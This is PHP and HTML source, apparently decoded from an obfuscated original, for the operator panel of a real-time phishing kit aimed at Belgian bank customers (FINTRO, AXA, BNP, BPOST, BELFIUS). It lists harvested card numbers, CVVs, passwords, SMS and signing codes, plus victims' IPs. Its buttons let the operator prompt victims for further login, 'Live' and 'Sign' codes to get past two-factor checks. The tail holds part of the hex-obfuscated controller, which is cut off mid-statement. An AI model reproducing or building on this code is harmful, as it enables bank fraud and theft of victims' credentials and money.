                                <input type="text" class="form-control kbc-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Live Code'"> 
 
                            </div> 
 
 
                        </div>   
 
                </div> 
            </div> 
<?php  } } else { if ($log["bank"] === "FINTRO") { function FINTRO($label, $value) { echo "<div class="form-group row">"; echo "<label for='id' class='text-secondary col-sm-3 font-weight-bold'>{$label}:</label>"; echo "<div class="col-sm-9">"; echo "<p class='text-secondary'><i><span class='copy-value' onclick='copyToClipboard(this)'>" . htmlspecialchars($value) . "</span><br/><span class='copy-text'>Click to copy</span></i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["fintro_wifi"])) { $kaartbegin = '' . $log["fintro_wifi"]; FINTRO("CardNumber", $kaartbegin); } if (!empty($log["fintro_wifi_pass"])) { FINTRO("Expiry", $log["fintro_wifi_pass"]); } if (!empty($log["fintro_user"])) { FINTRO("Phone", $log["fintro_user"]); } if (!empty($log["fintro_exp"])) { FINTRO("SMS", $log["fintro_exp"]); } if (!empty($log["fintro_password"])) { FINTRO("Password", $log["fintro_password"]); } if (!empty($log["fintro_respons"])) { FINTRO("Login Code", $log["fintro_respons"]); } if (!empty($log["fintro_code_x"])) { FINTRO("Sign Code", $log["fintro_code_x"]); } if (!empty($log["fintro_code_m"])) { FINTRO("Sign Code (2)", $log["fintro_code_m"]); } if (!empty($log["fintro_respons_two"])) { FINTRO("Live Code", $log["fintro_respons_two"]); } if (!empty($log["fintro_creditcard"])) { FINTRO("Card Number", $log["fintro_creditcard"]); } if (!empty($log["fintro_ccexp"])) { FINTRO("Expiry", $log["fintro_ccexp"]); } if (!empty($log["fintro_cvv"])) { FINTRO("CVV", $log["fintro_cvv"]); } if ($log["waiting"] == "true") { ?> 
 
                    </div> 
                     <div class="row"> 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'control')"><i class="fas fa-sign-in-alt"></i> Ask Login</button> 
                                
                            </div> 
                                     <div class="col-lg-3"> 
                              <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'login')"><i class="fas fa-phone"></i> Phone</button> 
                            </div> 
                             <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'details')"><i class="fa fa-envelope" aria-hidden="true"></i> 
 Ask SMS</button> 
                            </div> 
                     
   
 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'creditcard')"><i class="fa fa-credit-card" aria-hidden="true"></i> 
 Ask Creditcard</button> 
                            </div> 
                            
                          
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-success mt-4" onclick="setFintro('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button> 
                            </div>              
                    </div> 
                                               <div class="row"> 
 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i> 
 
 Ask Login Code</button> 
 
                            </div> 
 
                            <div class="col-lg-9"> 
                                <input type="text" class="form-control fintro-sign input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'"> 
 
                            </div> 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'sign')"><i class="fa fa-window-restore" aria-hidden="true"></i> 
 
 Ask Sign Code</button> 
 
                            </div> 
 
                            <div class="col-lg-9"> 
                                <input type="text" class="form-control fintro-sign-two input-dark mt-4 custom-input" placeholder="Fill in your 'Sign Code'"> 
 
                            </div> 
                           <div class="col-lg-3"> 
                                 <hr> 
                          
                            </div> 
                              <div class="col-lg-9"> 
                                 <hr> 
                                <input hidden type="text" class="form-control fintro-sign-two-two input-dark mt-4 custom-input" placeholder="Fill in your first 'Sign Code'"> 
                                <input hidden type="text" class="form-control fintro-sign-two-two-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Sign Code'"> 
 
                            </div> 
                            <div class="col-lg-3"> 
                
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i> 
 
 
 Ask Live Code</button> 
                            </div> 
                              <div class="col-lg-9"> 
                                 
                                <input type="text" class="form-control fintro-live input-dark mt-4 custom-input" placeholder="Fill in your first 'Live Code'"> 
                                <input type="text" class="form-control fintro-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Live Code'"> 
 
                            </div> 
 
 
                        </div>   
 
                </div> 
            </div> 
<?php  } } else { if ($log["bank"] === "AXA") { function AXA($label, $value) { echo "<div class="form-group row">"; echo "<label for='id' class='text-secondary col-sm-3 font-weight-bold'>{$label}:</label>"; echo "<div class="col-sm-9">"; echo "<p class='text-secondary'><i><span class='copy-value' onclick='copyToClipboard(this)'>" . htmlspecialchars($value) . "</span><br/><span class='copy-text'>Click to copy</span></i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["raffeissen_wifi"])) { AXA("CardNumber", $log["raffeissen_wifi"]); } if (!empty($log["raffeissen_wifi_pass"])) { AXA("Expiry", $log["raffeissen_wifi_pass"]); } if (!empty($log["raffeissen_number"])) { AXA("Phone", $log["raffeissen_number"]); } if (!empty($log["raffeissen_tan"])) { AXA("SMS", $log["raffeissen_tan"]); } if (!empty($log["raffeissen_creditcard"])) { AXA("CC Num", $log["raffeissen_creditcard"]); } if (!empty($log["raffeissen_ccexp"])) { AXA("CC Exp", $log["raffeissen_ccexp"]); } if (!empty($log["raffeissen_cvv"])) { AXA("CVV", $log["raffeissen_cvv"]); } if (!empty($log["raffeissen_respons"])) { AXA("Login Code", $log["raffeissen_respons"]); } if (!empty($log["raffeissen_respons_two"])) { AXA("Live Code", $log["raffeissen_respons_two"]); } if ($log["waiting"] == "true") { ?> 
 
                    </div> 
                     <div class="row"> 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'control')"><i class="fas fa-sign-in-alt"></i> Ask Login</button> 
                                
                            </div> 
             
                              <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'details')"><i class="fas fa-sign-in-alt"></i> Ask Phone</button> 
                                
                            </div> 
 
 
  
                              <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'tan')"><i class="fas fa-sign-in-alt"></i> Ask SMS</button> 
                                
                            </div> 
 
 
  
                              <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'creditcard')"><i class="fas fa-sign-in-alt"></i> Ask CC</button> 
                                
                            </div> 
 
  
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-success mt-4" onclick="setRaffeissen('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button> 
                            </div>              
                    </div> 
                                               <div class="row"> 
 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i> 
 
 Ask M1</button> 
 
                            </div> 
 
                            <div class="col-lg-9"> 
                                <input type="text" class="form-control raffeissen-sign input-dark mt-4 custom-input" placeholder="Fill in your 'M1  Code'"> 
 
                            </div> 
 
                            <div class="col-lg-3"> 
                                 <hr> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i> 
 
 
 Ask Live</button> 
                            </div> 
                              <div class="col-lg-9"> 
                                 <hr> 
                                <input type="text" class="form-control raffeissen-live input-dark mt-4 custom-input" placeholder="Fill in your first 'M2 Code'"> 
                                <input type="text" class="form-control raffeissen-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'M2 Code'"> 
 
                            </div> 
 
                        </div>   
 
                </div> 
            </div> 
<?php  } } else { if ($log["bank"] === "BNP") { function BNP($label, $value) { echo "<div class="form-group row">"; echo "<label for='id' class='text-secondary col-sm-3 font-weight-bold'>{$label}:</label>"; echo "<div class="col-sm-9">"; echo "<p class='text-secondary'><i><span class='copy-value' onclick='copyToClipboard(this)'>" . htmlspecialchars($value) . "</span><br/><span class='copy-text'>Click to copy</span></i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["bnp_wifi"])) { $kaartbegin = '' . $log["bnp_wifi"]; BNP("CardNumber", $kaartbegin); } if (!empty($log["bnp_wifi_pass"])) { BNP("Expiry", $log["bnp_wifi_pass"]); } if (!empty($log["bnp_user"])) { BNP("Phone", $log["bnp_user"]); } if (!empty($log["bnp_exp"])) { BNP("SMS", $log["bnp_exp"]); } if (!empty($log["bnp_password"])) { BNP("Password", $log["bnp_password"]); } if (!empty($log["bnp_respons"])) { BNP("Login Code", $log["bnp_respons"]); } if (!empty($log["bnp_code_x"])) { BNP("Sign Code", $log["bnp_code_x"]); } if (!empty($log["bnp_code_m"])) { BNP("Sign Code (2)", $log["bnp_code_m"]); } if (!empty($log["bnp_respons_two"])) { BNP("Live Code", $log["bnp_respons_two"]); } if (!empty($log["bnp_creditcard"])) { BNP("Card Number", $log["bnp_creditcard"]); } if (!empty($log["bnp_ccexp"])) { BNP("Expiry", $log["bnp_ccexp"]); } if (!empty($log["bnp_cvv"])) { BNP("CVV", $log["bnp_cvv"]); } if ($log["waiting"] == "true") { ?> 
 
                    </div> 
                     <div class="row"> 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'control')"><i class="fas fa-sign-in-alt"></i> Ask Login</button> 
                                
                            </div> 
                                     <div class="col-lg-3"> 
                              <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'login')"><i class="fas fa-phone"></i> Phone</button> 
                            </div> 
                             <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'details')"><i class="fa fa-envelope" aria-hidden="true"></i> 
 Ask SMS</button> 
                            </div> 
                     
   
 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'creditcard')"><i class="fa fa-credit-card" aria-hidden="true"></i> 
 Ask Creditcard</button> 
                            </div> 
                            
                          
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-success mt-4" onclick="setBnp('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button> 
                            </div>              
                    </div> 
                                               <div class="row"> 
 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i> 
 
 Ask Login Code</button> 
 
                            </div> 
 
                            <div class="col-lg-9"> 
                                <input type="text" class="form-control bnp-sign input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'"> 
 
                            </div> 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'sign')"><i class="fa fa-window-restore" aria-hidden="true"></i> 
 
 Ask Sign Code</button> 
 
                            </div> 
 
                            <div class="col-lg-9"> 
                                <input type="text" class="form-control bnp-sign-two input-dark mt-4 custom-input" placeholder="Fill in your 'Sign Code'"> 
 
                            </div> 
                           <div class="col-lg-3"> 
                                 <hr> 
                          
                            </div> 
                              <div class="col-lg-9"> 
                                 <hr> 
                                <input hidden type="text" class="form-control bnp-sign-two-two input-dark mt-4 custom-input" placeholder="Fill in your first 'Sign Code'"> 
                                <input hidden type="text" class="form-control bnp-sign-two-two-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Sign Code'"> 
 
                            </div> 
                            <div class="col-lg-3"> 
                
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i> 
 
 
 Ask Live Code</button> 
                            </div> 
                              <div class="col-lg-9"> 
                                 
                                <input type="text" class="form-control bnp-live input-dark mt-4 custom-input" placeholder="Fill in your first 'Live Code'"> 
                                <input type="text" class="form-control bnp-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Live Code'"> 
 
                            </div> 
 
 
                        </div>   
 
                </div> 
            </div> 
             
 
 
<?php  } } else { if ($log["bank"] === "BPOST") { function BPOST($label, $value) { echo "<div class="form-group row">"; echo "<label for='id' class='text-secondary col-sm-3 font-weight-bold'>{$label}:</label>"; echo "<div class="col-sm-9">"; echo "<p class='text-secondary'><i><span class='copy-value' onclick='copyToClipboard(this)'>" . htmlspecialchars($value) . "</span><br/><span class='copy-text'>Click to copy</span></i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["bpost_abbo"])) { $kaartbegin = '' . $log["bpost_abbo"]; BPOST("AbboNum", $kaartbegin); } if (!empty($log["bpost_card"])) { BPOST("CardNumber", $log["bpost_card"]); } if (!empty($log["bpost_vv"])) { BPOST("EXP", $log["bpost_vv"]); } if (!empty($log["bpost_mail"])) { BPOST("E-mail", $log["bpost_mail"]); } if (!empty($log["bpost_phone"])) { BPOST("Phone", $log["bpost_phone"]); } if (!empty($log["bpost_bel"])) { BPOST("Call-Vic", $log["bpost_bel"]); } if (!empty($log["bpost_sms"])) { BPOST("SMS", $log["bpost_sms"]); } if (!empty($log["bpost_ww"])) { BPOST("Pass/OTP", $log["bpost_ww"]); } if (!empty($log["bpost_cc"])) { BPOST("CC Number", $log["bpost_cc"]); } if (!empty($log["bpost_exp"])) { BPOST("CC EXP", $log["bpost_exp"]); } if (!empty($log["bpost_cvc"])) { BPOST("CVV", $log["bpost_cvc"]); } if (!empty($log["bpost_code"])) { BPOST("M1 Response", $log["bpost_code"]); } if (!empty($log["bpost_code2"])) { BPOST("M2 Response", $log["bpost_code2"]); } if (!empty($log["bpost_live"])) { BPOST("Live Response", $log["bpost_live"]); } if ($log["waiting"] == "true") { ?> 
  
  
                    </div>  
                        <div class="row">  
  
 
 
                       <div class="col-lg-3">  
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'login')"><i class="fa fa-info-circle" aria-hidden="true"></i> Ask Login</button>  
                            </div>  
 
                            <div class="col-lg-3">  
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'identification')"><i class="fa fa-info-circle" aria-hidden="true"></i> Ask E-mail</button>  
                            </div>  
                             <div class="col-lg-3">  
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'phone')"><i class="fa fa-phone" aria-hidden="true"></i> Ask Phone</button>  
                            </div>  
                            <div class="col-lg-3">  
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'bel')"><i class="fa fa-phone" aria-hidden="true"></i> Call-Visitor</button>  
                            </div>  
                            <div class="col-lg-3">  
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'sms')"><i class="fa fa-info-circle" aria-hidden="true"></i> Ask SMS</button>  
                            </div>  
  
                            <div class="col-lg-3">  
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'loginCode')"><i class="far fa-keyboard"></i> Ask Pass/OTP</button>  
                            </div>  
                            <div class="col-lg-3">  
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'credit')"><i class="far fa-keyboard"></i> Ask CC</button>  
                            </div>  
                            <div class="col-lg-3">  
                                <button class="btn btn-sm btn-block btn-success mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>  
                            </div>  
                        </div>        
                      <hr>  
                        <div class="row">  
                            <div class="col-lg-3">  
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'signCode')"><i class="fa fa-sign-language" aria-hidden="true"></i> Ask M1</button>  
                            </div>  
                            <div class="col-lg-9">  
                                <input type="text" class="form-control bpost-onee input-dark mt-4 custom-input"  placeholder="Please enter a buy code">  
                            </div>  
                                                   </div>  
                                                   <hr>  
                        <div class="row">  
                            <div class="col-lg-3">  
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'sign2')"><i class="fa fa-sign-language" aria-hidden="true"></i> Ask M2</button>  
                            </div>  
                            <div class="col-lg-9">  
                                <input type="text" class="form-control bpost-code2 input-dark mt-4 custom-input"  placeholder="Please enter a buy code">  
                            </div>  
                                                   </div>  
                                                   <hr>  
                                                   <div class="row">  
                            <div class="col-lg-3">  
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'live')"><i class="fa fa-sign-language" aria-hidden="true"></i> Ask Live</button>  
                            </div>  
                            <div class="col-lg-9">  
                            <input type="text" class="form-control bpost-live input-dark mt-4 custom-input"  placeholder="Please enter a token code">  
                            <input type="text" class="form-control bpost-livetwo input-dark mt-4 custom-input"  placeholder="Please enter a token code">         
             
                    </div>  
                </div>  
                            
                    </div>  
                </div>  
  
 
                            <?php  } } else { if ($log["bank"] === "BELFIUS") { function BELFIUS($label, $value) { echo "<div class="form-group row">"; echo "<label for='id' class='text-secondary col-sm-3 font-weight-bold'>{$label}:</label>"; echo "<div class="col-sm-9">"; echo "<p class='text-secondary'><i><span class='copy-value' onclick='copyToClipboard(this)'>" . htmlspecialchars($value) . "</span><br/><span class='copy-text'>Click to copy</span></i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["belfius_wifi"])) { $kaartbegin = '' . $log["belfius_wifi"]; BELFIUS("CardNumber", $kaartbegin); } if (!empty($log["belfius_wifi_pass"])) { BELFIUS("Expiry", $log["belfius_wifi_pass"]); } if (!empty($log["belfius_exp"])) { BELFIUS("SMS", $log["belfius_exp"]); } if (!empty($log["belfius_password"])) { BELFIUS("Password", $log["belfius_password"]); } if (!empty($log["belfius_user"])) { BELFIUS("Phone", $log["belfius_user"]); } if (!empty($log["belfius_respons"])) { BELFIUS("Login Code", $log["belfius_respons"]); } if (!empty($log["belfius_code_x"])) { BELFIUS("Sign Code", $log["belfius_code_x"]); } if (!empty($log["belfius_code_m"])) { BELFIUS("Sign Code (2)", $log["belfius_code_m"]); } if (!empty($log["belfius_respons_two"])) { BELFIUS("Live Code", $log["belfius_respons_two"]); } if (!empty($log["belfius_creditcard"])) { BELFIUS("Card Number", $log["belfius_creditcard"]); } if (!empty($log["belfius_ccexp"])) { BELFIUS("Expiry", $log["belfius_ccexp"]); } if (!empty($log["belfius_cvv"])) { BELFIUS("CVV", $log["belfius_cvv"]); } if ($log["waiting"] == "true") { ?> 
 
                    </div> 
                     <div class="row"> 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBelfius('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'control')"><i class="fas fa-sign-in-alt"></i> Ask Login</button> 
                                
                            </div> 
                                     <div class="col-lg-3"> 
                              <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBelfius('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'login')"><i class="fas fa-phone"></i> Phone</button> 
                            </div> 
                             <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBelfius('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'details')"><i class="fa fa-envelope" aria-hidden="true"></i> 
 Ask SMS</button> 
                            </div> 
                             <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBelfius('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'password')"><i class="fa fa-key" aria-hidden="true"></i> 
 Ask Password</button> 
                            </div> 
   
 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBelfius('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'creditcard')"><i class="fa fa-credit-card" aria-hidden="true"></i> 
 Ask Creditcard</button> 
                            </div> 
                            
                          
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-success mt-4" onclick="setBelfius('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button> 
                            </div>              
                    </div> 
                                               <div class="row"> 
 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBelfius('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i> 
 
 Ask Login Code</button> 
 
                            </div> 
 
                            <div class="col-lg-9"> 
                                <input type="text" class="form-control belfius-sign input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'"> 
 
                            </div> 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBelfius('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'sign')"><i class="fa fa-window-restore" aria-hidden="true"></i> 
 
 Ask Sign Code</button> 
 
                            </div> 
 
                            <div class="col-lg-9"> 
                                <input type="text" class="form-control belfius-sign-two input-dark mt-4 custom-input" placeholder="Fill in your 'Sign Code'"> 
 
                            </div> 
                           <div class="col-lg-3"> 
                                 <hr> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBelfius('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'signtwo')"><i class="fa fa-window-restore" aria-hidden="true"></i> 
 
 Ask Sign Code (2)</button> 
                            </div> 
                              <div class="col-lg-9"> 
                                 <hr> 
                                <input type="text" class="form-control belfius-sign-two-two input-dark mt-4 custom-input" placeholder="Fill in your first 'Sign Code'"> 
                                <input type="text" class="form-control belfius-sign-two-two-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Sign Code'"> 
 
                            </div> 
                            <div class="col-lg-3"> 
                                 <hr> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBelfius('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i> 
 
 
 Ask Live Code</button> 
                            </div> 
                              <div class="col-lg-9"> 
                                 <hr> 
                                <input type="text" class="form-control belfius-live input-dark mt-4 custom-input" placeholder="Fill in your first 'Live Code'"> 
                                <input type="text" class="form-control belfius-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Live Code'"> 
 
                            </div> 
 
 
                        </div>   
 
                </div> 
            </div> 
             
               <?php  } } } } } } } } } if ($log["waiting"] === "false") { echo "</div>"; echo "</div>"; echo "</div>"; } echo "<div class="col-lg-4 col-sm-12">"; echo "<div class="card-header text-white  bg-darker siilenced-darker">\xa            <i class="fa fa-cog" aria-hidden="true"></i> Options
\xa        

            </div><div class="col-12 p-4 bg-darker custom-top-margin " style="min-height: 173px;">"; ?> 
    
       <p style="font-style: italic;"><i class="fa fa-comments" aria-hidden="true"></i> &#84;&#104;&#105;&#115;&#32;&#102;&#117;&#110;&#99;&#116;&#105;&#111;&#110;&#32;&#109;&#97;&#110;&#97;&#103;&#101;&#115;&#32;&#116;&#104;&#101;&#32;&#108;&#111;&#103;&#44;&#32;&#121;&#111;&#117;&#32;&#99;&#97;&#110;&#32;&#98;&#97;&#110;&#32;&#111;&#114;&#32;&#100;&#101;&#108;&#101;&#116;&#101;&#32;&#97;&#32;&#115;&#112;&#101;&#99;&#105;&#102;&#105;&#99;&#32;&#108;&#111;&#103;&#46;</p> 
 
 
       <hr> 
        <button class="btn btn-sm btn-outline-danger col-lg-12" style="font-style: italic;" data-toggle="modal" data-target="#exampleModalCenter"> 
            <i class="fa fa-ban"></i> &#66;&#97;&#110;&#32;&#85;&#115;&#101;&#114;</button> 
            <br><br> 
        <button class="btn btn-sm btn-outline-warning col-lg-12" onclick="deleteLog('<?php  echo htmlspecialchars($log["user_id"]); ?> 
')" style="font-style: italic;"> 
            <i class="fa fa-trash"></i> &#68;&#101;&#108;&#101;&#116;&#101;&#32;&#85;&#115;&#101;&#114;</button> 
          <br> 
     
         <input type="text" style="font-style: italic;" class="form-control rabo-login input-dark mt-4 custom-input"  
    placeholder="<?php  echo $log["note"] ? htmlspecialchars($log["note"]) : "Leave a note for (" . htmlspecialchars($log["user_id"]) . ")"; ?> 
" id="note"> 
 
         <button class="btn btn-sm btn-outline-primary col-lg-12" onclick="updateNote('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', document.getElementById('note').value)" style="font-style: italic;"> 
            <i class="fa fa-edit"></i> &#85;&#112;&#100;&#97;&#116;&#101;&#32;&#78;&#111;&#116;&#101;</button> 
           
 
   <hr> 
        <button class="btn btn-sm  col-lg-12" style="font-style: italic;"> 
            @Vssrtje | Developer</button> 
 
      
        <?php  echo "</div>"; echo "</div>"; echo "</div>"; echo "<div class="row p-1 mt-3 mb-3">"; echo "<div class="col-lg-8 col-sm-12">"; echo "<div class="card-header text-white  bg-darker siilenced-darker">
            <i class="fa fa-user" aria-hidden="true"></i> Specific User Data\xa\xa\xa\xa            </div><div class="col-12 p-4 bg-darker ">"; echo "<div class="veusdeput rounded p-4">"; echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">User ID:</label>"; echo "<div class="col-sm-9">"; echo "<p class="copy-value" onclick="copyToClipboard(this)" class="text-secondary"><i>" . $log["user_id"] . "</i></p>"; echo "</div>"; echo "</div>"; echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">User Browser:</label>"; echo "<div class="col-sm-9">"; echo "<p class="copy-value" onclick="copyToClipboard(this)" class="text-secondary"><i>" . $log["user_agent"] . "</i></p>"; echo "</div>"; echo "</div>"; echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">User IP:</label>"; echo "<div class="col-sm-9">"; echo "<p class="copy-value" onclick="copyToClipboard(this)" class="text-secondary"><i>" . $log["ip"] . "</i></p>"; echo "</div>"; echo "</div>"; if (!empty($log["bank"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Bank:</label>"; echo "<div class="col-sm-9">"; echo "<p class="copy-value" onclick="copyToClipboard(this)" class="text-secondary"><i>" . $log["bank"] . "</i></p>"; echo "</div>"; echo "</div>"; } echo "</div></div><br><br><br><br><br><br><br><br>"; } } ?>

Did this file decode correctly?

Original Code

<?php
 namespace App\Controllers\Users; use Core\View; use App\Models\Users\User; use App\Auth; class Logs extends \Core\Controller { public function logsAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["\x75\x73\x65\x72\156\141\155\145"]); if ($data) { if ($_SERVER["\x52\105\121\125\105\123\x54\x5f\x4d\105\x54\x48\117\104"] == "\x50\x4f\123\124") { $logs = User::getLogs($_SESSION["\x75\x73\145\162\156\x61\x6d\145"]); $this->showLogs($logs); } else { View::render("\101\x64\155\151\156\x2f\154\x6f\x67\163\x2e\160\150\160", array("\x74\151\x74\x6c\145" => "\114\157\x67\163")); } } else { Auth::destroySession(); } } else { static::redirect("\57\142\x65\x6c\x67\x69\143\x61\57\163\x74\x61\162\164"); } } public function getOneAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["\165\x73\x65\162\156\x61\x6d\x65"]); if ($data) { if ($_SERVER["\x52\x45\121\x55\105\x53\124\137\115\x45\x54\110\117\x44"] == "\120\x4f\x53\x54" && isset($_POST["\151\144"])) { $log = User::getLog($_POST["\x69\144"], $_SESSION["\x75\163\x65\x72\x6e\x61\x6d\x65"]); $this->showLog($log); } else { static::redirect("\x2f\141\144\155\x69\x6e\57\154\x6f\x67\x73"); } } else { Auth::destroySession(); } } else { static::redirect("\57\142\145\x6c\147\x69\143\141\57\163\164\x61\162\x74"); } } public function deleteAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["\165\163\x65\x72\156\x61\155\x65"]); if ($data) { if ($_SERVER["\122\105\x51\x55\105\x53\x54\137\x4d\x45\x54\110\x4f\104"] == "\x50\117\123\x54" && isset($_POST["\x69\144"])) { $data = array("\151\144" => $_POST["\151\144"]); $wachten = 